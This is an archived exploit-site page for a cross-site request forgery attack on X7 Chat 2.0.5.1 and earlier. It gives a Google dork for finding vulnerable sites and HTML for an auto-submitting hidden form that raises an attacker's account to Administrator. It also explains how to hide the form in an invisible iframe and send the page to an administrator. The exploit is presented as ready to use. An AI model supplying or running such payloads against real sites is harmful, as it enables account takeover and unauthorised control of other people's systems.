exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

X7 Chat 2.0.5.1 Cross Site Request Forgery

X7 Chat 2.0.5.1 Cross Site Request Forgery
Posted May 9, 2012
Authored by DennSpec

X7 Chat versions 2.0.5.1 and below suffer from a cross site request forgery vulnerability.

tags | exploit, csrf
SHA-256 | 5a6c30045da825b60c8631b4e54c65d985928c2498b1dc1768c3aaa8458e6b85

X7 Chat 2.0.5.1 Cross Site Request Forgery

Change Mirror Download
# Exploit Title: X7 Chat 2.0.5.1 CSRF Add Admin Exploit
# Google Dork: intitle:"Chat Room" "Powered By X7 Chat 2.0.5"
# Date: 09.05.2012
# Author: DennSpec
# Software Link: http://x7chat.com/releases/v2/x7chat2_0_5_1.zip
# Version: <= 2.0.5.1

firstly, register and give a username.

(frame.html in path of your main html page)

<html>
<body onload="document.xform.submit();">
<form name="xform" action="http://xxxxxxxxx.com/x7path/index.php?act=adminpanel&cp_page=users&update=YOURUSERNAME" method="post">
<input type="hidden" name="username" value="YOURUSERNAME" />
<input type="hidden" name="usergroup" value="Administrator" />
</form>
</body>
</html>

Replace http://xxxxxxxxx.com/x7path/ to your target url. Dont forget replace YOURUSERNAME to YOURUSERNAME.

add this code to inside body tag of main html page:
<iframe style="display:none;" src="frame.html"></iframe>

and... upload main page and frame.html . Send main page url to any administrator.

Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    0 Files
  • 15
    Nov 15th
    0 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close